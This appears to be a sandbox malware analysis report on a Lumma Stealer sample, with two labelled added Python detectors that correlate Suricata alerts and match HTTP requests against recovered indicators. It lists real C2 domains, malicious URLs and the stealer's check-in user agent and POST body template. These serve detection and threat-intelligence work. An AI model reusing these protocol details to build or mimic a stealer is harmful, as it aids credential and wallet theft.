
Windows Analysis Report
SPFFah2O2q.exe

Overview

General Information

Sample name: SPFFah2O2q.exe (renamed because the original name is a hash value)
Original sample name: d4d4b5b6ca79bb5b57e8ef3791629e47.exe
Analysis ID: 1580893
MD5: d4d4b5b6ca79bb5b57e8ef3791629e47
SHA1: 6b8a0d8b88456527484a3eed58f249131d74f436
SHA256: 764ee0242a1a188052d65038c3967ceef1cc0554243bc60412d0d5a85064d053
Tags: exe, user-abuse_ch

Detection

Detected family: LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SPFFah2O2q.exe (PID: 768 cmdline: "C:\Users\user\Desktop\SPFFah2O2q.exe" MD5: D4D4B5B6CA79BB5B57E8EF3791629E47)
    • WerFault.exe (PID: 4032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1812 MD5: C31336C1EFC2CCB44B4326EA793040F2)
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Extracted malware configuration (LummaC):
{"C2 url": ["discokeyus.lat", "sustainskelet.lat", "necklacebudi.lat", "grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "aspecteirs.lat", "rapeflowwj.lat"], "Build id": "4h5VfH--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1722412139.00000000020C0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: SPFFah2O2q.exe PID: 768 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
(3 further entries not shown in this export)
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-26T12:57:12.779136+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 23.55.153.106 | 443 | TCP
2024-12-26T12:57:15.330280+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:17.432243+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:19.927100+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:22.644353+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49709 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:25.385903+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49711 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:16.092621+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:18.190258+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:16.092621+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:18.190258+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:08.211464+0100 | 2058354 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 56154 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:10.149481+0100 | 2058358 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 58515 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:09.069993+0100 | 2058360 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 64416 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:09.692828+0100 | 2058362 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 52581 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:08.692867+0100 | 2058364 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 54839 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:09.293849+0100 | 2058370 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 52196 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:10.369987+0100 | 2058374 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 58018 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:09.922659+0100 | 2058376 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 57407 | 1.1.1.1 | 53 | UDP
2024-12-26T12:57:20.828002+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-26T12:57:13.585530+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49705 | 23.55.153.106 | 443 | TCP
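The alert table above shows the order of events on the wire: within about two seconds the sample resolves every C2 domain from its configuration (one ET "CnC Domain in DNS Lookup" SID per domain, all UDP/53 to 1.1.1.1), and only then do the TLS sessions to 172.67.157.254 and 23.55.153.106 appear with the C2-traffic SIDs. That sequence is a usable detection on its own. The following is an added example, not part of the Joe Sandbox report: correlation logic run over the report's own alert rows (ALERTS_TXT is copied from the table; the 5-second window and the 3-domain threshold are tuning choices of this example, not values from the report). It parses the rows, finds, per source host, the largest set of C2-domain DNS alerts inside the window, and then lists the severity-1, non-DNS destinations that host contacted afterwards. Note that SID 2858666 is classified "Domain Observed Used for C2 Detected" but is a TCP/443 alert, so the UDP/53 filter treats it as follow-up traffic rather than as part of the DNS burst.

```python
"""
Added example, not part of the Joe Sandbox report: a burst-then-callback
correlation over Suricata alerts. ALERTS_TXT is the report's alert table
(pipe-separated); WINDOW and MIN_DOMAINS are this example's own tuning.
"""
from collections import defaultdict
from datetime import datetime, timedelta

ALERTS_TXT = """\
2024-12-26T12:57:12.779136+0100|2028371|3|Unknown Traffic|192.168.2.8|49705|23.55.153.106|443|TCP
2024-12-26T12:57:15.330280+0100|2028371|3|Unknown Traffic|192.168.2.8|49706|172.67.157.254|443|TCP
2024-12-26T12:57:17.432243+0100|2028371|3|Unknown Traffic|192.168.2.8|49707|172.67.157.254|443|TCP
2024-12-26T12:57:19.927100+0100|2028371|3|Unknown Traffic|192.168.2.8|49708|172.67.157.254|443|TCP
2024-12-26T12:57:22.644353+0100|2028371|3|Unknown Traffic|192.168.2.8|49709|172.67.157.254|443|TCP
2024-12-26T12:57:25.385903+0100|2028371|3|Unknown Traffic|192.168.2.8|49711|172.67.157.254|443|TCP
2024-12-26T12:57:16.092621+0100|2054653|1|A Network Trojan was detected|192.168.2.8|49706|172.67.157.254|443|TCP
2024-12-26T12:57:18.190258+0100|2054653|1|A Network Trojan was detected|192.168.2.8|49707|172.67.157.254|443|TCP
2024-12-26T12:57:16.092621+0100|2049836|1|A Network Trojan was detected|192.168.2.8|49706|172.67.157.254|443|TCP
2024-12-26T12:57:18.190258+0100|2049812|1|A Network Trojan was detected|192.168.2.8|49707|172.67.157.254|443|TCP
2024-12-26T12:57:08.211464+0100|2058354|1|Domain Observed Used for C2 Detected|192.168.2.8|56154|1.1.1.1|53|UDP
2024-12-26T12:57:10.149481+0100|2058358|1|Domain Observed Used for C2 Detected|192.168.2.8|58515|1.1.1.1|53|UDP
2024-12-26T12:57:09.069993+0100|2058360|1|Domain Observed Used for C2 Detected|192.168.2.8|64416|1.1.1.1|53|UDP
2024-12-26T12:57:09.692828+0100|2058362|1|Domain Observed Used for C2 Detected|192.168.2.8|52581|1.1.1.1|53|UDP
2024-12-26T12:57:08.692867+0100|2058364|1|Domain Observed Used for C2 Detected|192.168.2.8|54839|1.1.1.1|53|UDP
2024-12-26T12:57:09.293849+0100|2058370|1|Domain Observed Used for C2 Detected|192.168.2.8|52196|1.1.1.1|53|UDP
2024-12-26T12:57:10.369987+0100|2058374|1|Domain Observed Used for C2 Detected|192.168.2.8|58018|1.1.1.1|53|UDP
2024-12-26T12:57:09.922659+0100|2058376|1|Domain Observed Used for C2 Detected|192.168.2.8|57407|1.1.1.1|53|UDP
2024-12-26T12:57:20.828002+0100|2048094|1|Malware Command and Control Activity Detected|192.168.2.8|49708|172.67.157.254|443|TCP
2024-12-26T12:57:13.585530+0100|2858666|1|Domain Observed Used for C2 Detected|192.168.2.8|49705|23.55.153.106|443|TCP
"""

WINDOW = timedelta(seconds=5)   # tuning choice of this example
MIN_DOMAINS = 3                 # tuning choice of this example


def parse_alerts(text: str):
    """Turn the pipe-separated rows into dicts with typed fields."""
    rows = []
    for line in text.splitlines():
        ts, sid, sev, cls, src, sport, dst, dport, proto = line.split("|")
        rows.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "sev": int(sev), "cls": cls,
            "src": src, "sport": int(sport), "dst": dst, "dport": int(dport), "proto": proto,
        })
    return rows


def is_c2_dns_alert(a) -> bool:
    """A DNS query to a resolver that hit a 'domain used for C2' rule."""
    return a["proto"] == "UDP" and a["dport"] == 53 and a["cls"] == "Domain Observed Used for C2 Detected"


def dns_bursts(alerts, window=WINDOW, min_domains=MIN_DOMAINS):
    """Per source host: the largest set of distinct C2-domain DNS alerts inside `window`."""
    by_src = defaultdict(list)
    for a in alerts:
        if is_c2_dns_alert(a):
            by_src[a["src"]].append(a)
    found = {}
    for src, rows in by_src.items():
        rows.sort(key=lambda a: a["ts"])
        best = None
        for i in range(len(rows)):
            j = i
            while j + 1 < len(rows) and rows[j + 1]["ts"] - rows[i]["ts"] <= window:
                j += 1
            sids = {a["sid"] for a in rows[i:j + 1]}   # one ET SID per C2 domain
            if len(sids) >= min_domains and (best is None or len(sids) > len(best["sids"])):
                best = {"sids": sids, "start": rows[i]["ts"], "end": rows[j]["ts"]}
        if best:
            found[src] = best
    return found


def followup_c2(alerts, src, after):
    """Severity-1, non-DNS alerts from `src` after the burst, grouped by (dst, dport)."""
    dests = defaultdict(set)
    for a in alerts:
        if a["src"] == src and a["ts"] > after and a["sev"] == 1 and not is_c2_dns_alert(a):
            dests[(a["dst"], a["dport"])].add(a["sid"])
    return {k: sorted(v) for k, v in dests.items()}


def summarize(alerts):
    """Hosts that resolved a burst of C2 domains, with the callbacks that followed."""
    out = {}
    for src, burst in dns_bursts(alerts).items():
        out[src] = {
            "domains_resolved": len(burst["sids"]),
            "burst_seconds": (burst["end"] - burst["start"]).total_seconds(),
            "c2_destinations": followup_c2(alerts, src, burst["end"]),
        }
    return out


ALERTS = parse_alerts(ALERTS_TXT)

if __name__ == "__main__":
    for host, summary in summarize(ALERTS).items():
        print(host, summary)
```

On this report the detector yields one host, 192.168.2.8, with eight distinct C2 domains resolved in about 2.2 seconds and subsequent severity-1 alerts to 172.67.157.254:443 and 23.55.153.106:443. The same logic applied to a SIEM's Suricata feed catches the stealer's start-up domain rotation even when the resolved IPs change from build to build, because it keys on the rule family and the timing, not on the destination addresses.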


            AV Detection

Source: SPFFah2O2q.exe | Avira: detected
Source: https://lev-tolstoi.com/CDaU | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/Conte | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/;; | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/m/r | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apiC | Avira URL Cloud: Label: malware
Source: https://help.steampowered.co | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/https: | Avira URL Cloud: Label: malware
Source: 0.3.SPFFah2O2q.exe.2140000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["discokeyus.lat", "sustainskelet.lat", "necklacebudi.lat", "grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "aspecteirs.lat", "rapeflowwj.lat"], "Build id": "4h5VfH--"}
Source: SPFFah2O2q.exe | VirusTotal: Detection: 41%
Source: SPFFah2O2q.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: SPFFah2O2q.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rapeflowwj.lat
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: crosshuaht.lat
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sustainskelet.lat
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: aspecteirs.lat
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: energyaffai.lat
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: necklacebudi.lat
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: discokeyus.lat
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: grannyejh.lat
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: aspecteirs.lat
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.1430414609.0000000002140000.00000004.00001000.00020000.00000000.sdmp | String decryptor: 4h5VfH--
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 0_2_00415799 CryptUnprotectData | 0_2_00415799
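The string decryptor output is the practically useful part of this section: together with the extracted configuration it gives the C2 domain list, the build id 4h5VfH--, the hard-coded user agent TeslaBrowser/5.5, and the printf-style body template lid=%s&j=%s&ver=4.0 used for the check-in POST. The following is an added example, not part of the Joe Sandbox report and not LummaC code: a request-level check that turns those four indicators into a detector and runs it over constructed HTTP requests. The path /api and every parameter value in SAMPLE_REQUESTS are placeholders for the demonstration, not traffic recorded in the analysis. One caveat a deployer needs: every C2 session in this report is TLS 1.2 (Compliance section), and the sandbox sees the plaintext because it proxies TLS (the YARA hits are on sslproxydump.pcap), so this kind of content matching only works where TLS is terminated or intercepted, or on the endpoint.

```python
"""
Added example, not part of the Joe Sandbox report and not LummaC code:
match HTTP requests against the indicators recovered above (C2 domains,
build id, user agent, check-in body template). SAMPLE_REQUESTS are
constructed; /api and the parameter values are placeholders.
"""
from dataclasses import dataclass, field
from urllib.parse import parse_qs

# Indicators taken from the report above.
C2_DOMAINS = {
    "discokeyus.lat", "sustainskelet.lat", "necklacebudi.lat", "grannyejh.lat",
    "crosshuaht.lat", "energyaffai.lat", "aspecteirs.lat", "rapeflowwj.lat",
}
BUILD_ID = "4h5VfH--"
USER_AGENT = "TeslaBrowser/5.5"
# "lid=%s&j=%s&ver=4.0" is a printf template: the key names and ver are fixed,
# the two %s values vary per victim, so only the shape is matched.
CHECKIN_KEYS = {"lid", "j", "ver"}
CHECKIN_VER = "4.0"


@dataclass
class Verdict:
    host: str
    reasons: list = field(default_factory=list)

    @property
    def malicious(self) -> bool:
        return bool(self.reasons)


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect(raw: str) -> Verdict:
    """Return a Verdict listing every indicator the request matched."""
    method, _path, headers, body = parse_request(raw)
    host = headers.get("host", "").lower()
    verdict = Verdict(host)
    if host in C2_DOMAINS:
        verdict.reasons.append("host is in the extracted C2 list")
    if headers.get("user-agent") == USER_AGENT:
        verdict.reasons.append("user agent matches the decrypted string")
    if method == "POST":
        params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
        if CHECKIN_KEYS <= params.keys() and params["ver"] == CHECKIN_VER:
            verdict.reasons.append("body matches the lid/j/ver=4.0 check-in template")
        if BUILD_ID in body:
            verdict.reasons.append("body carries the extracted build id")
    return verdict


def scan(requests):
    """Inspect each raw request and return the verdicts in order."""
    return [inspect(r) for r in requests]


# Constructed sample traffic for the demonstration (not from the analysis).
SAMPLE_REQUESTS = [
    # check-in shaped like the decrypted template, sent to a configured C2 domain
    "POST /api HTTP/1.1\r\nHost: crosshuaht.lat\r\nUser-Agent: TeslaBrowser/5.5\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "lid=4h5VfH--&j=&ver=4.0",
    # benign request from an ordinary browser user agent
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    # the hard-coded user agent alone, to a host not in the config: still flagged
    "POST /api HTTP/1.1\r\nHost: unknown.example\r\nUser-Agent: TeslaBrowser/5.5\r\n\r\nact=life",
]

if __name__ == "__main__":
    for v in scan(SAMPLE_REQUESTS):
        print(v.host, "MALICIOUS" if v.malicious else "clean", v.reasons)
```

The first constructed request trips all four checks, the second none, the third only the user-agent check. Keeping the reasons separate matters operationally: the domain list and build id change per campaign and are only good for this wave, while the user agent and the body template are baked into the family's string table and survive a C2 rotation.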

            Compliance

Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Unpacked PE file: 0.2.SPFFah2O2q.exe.400000.0.unpack
Source: SPFFah2O2q.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ebx, esi | 0_2_00422190
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [ebx], cx | 0_2_00422190
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 0_2_00422190
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ecx, eax | 0_2_00409580
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [ebp+00h], ax | 0_2_00409580
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h] | 0_2_0043C767
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then lea edx, dword ptr [ecx+01h] | 0_2_0040B70C
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov esi, eax | 0_2_00415799
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ecx, eax | 0_2_00415799
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then jmp eax | 0_2_0042984F
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh] | 0_2_00423860
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov edx, ecx | 0_2_00438810
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh | 0_2_00438810
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh | 0_2_00438810
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then test eax, eax | 0_2_00438810
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [edi], al | 0_2_0041682D
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h] | 0_2_0041682D
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h] | 0_2_0041682D
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [ecx], bp | 0_2_0041D83A
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then push C0BFD6CCh | 0_2_00423086
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then push C0BFD6CCh | 0_2_00423086
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 0_2_0042B170
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov eax, dword ptr [esp+00000080h] | 0_2_004179C1
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h | 0_2_0043B1D0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ebx, eax | 0_2_0043B1D0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [ecx], dx | 0_2_004291DD
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-20h] | 0_2_004291DD
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ebx, eax | 0_2_00405990
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ebp, eax | 0_2_00405990
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_0042CA49
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_0042DA53
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh] | 0_2_00416263
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh] | 0_2_00415220
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then push esi | 0_2_00427AD3
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_0042CAD0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [ebx], ax | 0_2_0041B2E0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then push ebx | 0_2_0043CA93
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_0041CB40
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [esi], cx | 0_2_0041CB40
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_00428B61
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_0042CB11
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_0042CB22
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax] | 0_2_0043F330
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ebx, eax | 0_2_0040DBD9
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ebx, eax | 0_2_0040DBD9
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh] | 0_2_00417380
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h | 0_2_0041D380
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp al, 2Eh | 0_2_00426B95
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_00435450
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh] | 0_2_00417380
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then push 00000000h | 0_2_00429C2B
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [ecx], dx | 0_2_004291DD
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-20h] | 0_2_004291DD
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 0_2_004074F0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 0_2_004074F0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] | 0_2_0043ECA0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h | 0_2_004385E0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then jmp eax | 0_2_004385E0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h] | 0_2_00417DEE
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then jmp dword ptr [0044450Ch] | 0_2_00418591
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov eax, dword ptr [ebp-68h] | 0_2_00428D93
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then xor edi, edi | 0_2_0041759F
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov eax, dword ptr [0044473Ch] | 0_2_0041C653
